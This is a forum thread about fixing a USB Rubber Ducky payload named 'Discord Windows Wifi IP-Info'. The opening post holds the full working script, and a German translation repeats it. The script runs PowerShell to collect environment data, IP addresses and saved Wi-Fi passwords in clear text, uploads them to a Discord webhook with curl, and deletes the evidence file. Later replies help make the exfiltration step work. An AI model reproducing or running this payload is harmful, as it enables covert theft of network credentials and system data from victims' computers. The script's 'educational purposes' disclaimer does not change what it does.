Jump to content

Powershell Issue


Recommended Posts

I was trying to run the Discord Windows Wifi on my new MK II Rubber Ducky, and when I generated the inject.bin I get the the powershell to show up, but the Payload never sends the command to powershell.  The window stays open and i can see another command line as if the enter key was sent, but not the string.  I Went through and tried it manually, and it sends the webhook to discord when I cut and paste in PS, but now with the ducky.  Might be an issue with the Payload Studio.

 

REM Title:          Discord Windows Wifi IP-Info
REM Description:    Grabs wifi passwords, environment data, IPv4 Network addresses, writes to a file, uploads it to Discord, then cleans up the file on the targets filesystem and exits. 
REM Author:         Startrk1995
REM Props:          Hak5 Team
REM Version:        1.0
REM Category:       Exfiltration
REM Target:         Windows 10 (CMD + Powershell)
REM Attackmodes:    HID
REM Mandatory Info: Add your Discord Webhook URL in quotes with no spaces and with permission to post.
REM Discord URL:    Example: https://discord.com/api/webhooks/123456789012345678/adjlfjlejlidsjasdlijflie_ajsdflkjaljeiljkdajlkjd
REM Legal:          This script is for educational purposes only please do not use this for malicious purposes

DELAY 500
GUI r
DELAY 200
STRING powershell
ENTER
DELAY 1000

REM I have this as all one command for quickness.

STRING $url="https://discord.com/api/webhooks/REMOVEDFROMPOST";dir env: >> stats.txt; Get-NetIPAddress -AddressFamily IPv4 | Select-Object IPAddress,SuffixOrigin | where IPAddress -notmatch '(127.0.0.1|169.254.\d+.\d+)' >> stats.txt;(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)}  | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{PROFILE_NAME=$name;PASSWORD=$pass}} | Format-Table -AutoSize >> stats.txt;$Body=@{ content = "$env:computername Stats from Ducky/Pico"};Invoke-RestMethod -ContentType 'Application/Json' -Uri $url  -Method Post -Body ($Body | ConvertTo-Json);curl.exe -F "file1=@stats.txt" $url ; Remove-Item '.\stats.txt';exit
ENTER

 

Thanks again,

Emilio

Link to comment
Share on other sites

  • 2 weeks later...
On 8/20/2022 at 1:48 AM, Emilio5639 said:

Ich habe versucht, das Discord Windows Wifi auf meinem neuen MK II Rubber Ducky auszuführen, und als ich die inject.bin generiert habe, wird die Powershell angezeigt, aber die Payload sendet den Befehl nie an die Powershell. Das Fenster bleibt geöffnet und ich kann eine andere Befehlszeile sehen, als ob die Eingabetaste gesendet wurde, aber nicht die Zeichenfolge. Ich bin durchgegangen und habe es manuell versucht, und es sendet den Webhook zu Zwietracht, wenn ich PS ausschneide und einfüge, aber jetzt mit dem Ducky. Könnte ein Problem mit Payload Studio sein.

 

REM-Titel: Discord Windows Wifi IP-Info
REM-Beschreibung: Erfasst WLAN-Passwörter, Umgebungsdaten, IPv4-Netzwerkadressen, schreibt in eine Datei, lädt sie auf Discord hoch, bereinigt dann die Datei im Zieldateisystem und beendet sich.
REM-Autor: Startrk1995
REM Requisiten: Hak5 Team
REM-Version: 1.0
REM-Kategorie: Exfiltration
REM-Ziel: Windows 10 (CMD + Powershell)
REM-Angriffsmodi: HID
REM Obligatorische Informationen: Fügen Sie Ihre Discord-Webhook-URL in Anführungszeichen ohne Leerzeichen und mit der Erlaubnis zum Posten hinzu.
REM-Discord-URL: Beispiel: https://discord.com/api/webhooks/123456789012345678/adjlfjlejlidsjasdlijflie_ajsdflkjaljeiljkdajlkjd
REM Legal: Dieses Skript dient nur zu Bildungszwecken, bitte verwenden Sie es nicht für böswillige Zwecke

VERZÖGERUNG 500
GUI r
VERZÖGERUNG 200
STRING-Powershell
EINTRETEN
VERZÖGERUNG 1000

REM Ich habe dies als einen einzigen Befehl für Schnelligkeit.

STRING $url="https://discord.com/api/webhooks/REMOVEFROMPOST";dir env: >> stats.txt; Get-NetIPAddress -AddressFamily IPv4 | Select-Object IPAddress,SuffixOrigin | where IPAddress -notmatch '(127.0.0.1|169.254.\d+.\d+)' >> stats.txt;(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Schlüsselinhalt\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{PROFILE_NAME=$name;PASSWORD=$pass}} | Format-Table -AutoSize >> stats.txt;$Body=@{ content = "$env:computername Stats from Ducky/Pico"};Invoke-RestMethod -ContentType 'Application/Json' -Uri $url -Method Post -Body ($Body | ConvertTo-Json);curl.exe -F "file1=@stats.txt" $url ; Remove-Item '.\stats.txt';beenden
EINTRETEN

 

Danke noch einmal,

Emilio

Hi, I'm currently trying to transfer data to Discord and found that the command

curl.exe -F "file1=@stats.txt" $url;

not working. The "-F" parameter doesn't seem to exist. How exactly did you solve the problem? Also would like to transfer a text file to Discord. But I haven't been able to fix the problem yet. I've also tried to code with Base64 and pass it as a single-line variable (string). Unfortunately, it is usually over 2000 characters.

Do you have a solution for me?

Thanks in advance!

Edited by Mork
Link to comment
Share on other sites

Not sure if you got the answer on Discord, but if the "true" curl binary hasn't been installed on the Windows system, it's simply an alias for Invoke-WebRequest so you can probably not expect it to work as the real curl command in every aspect.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...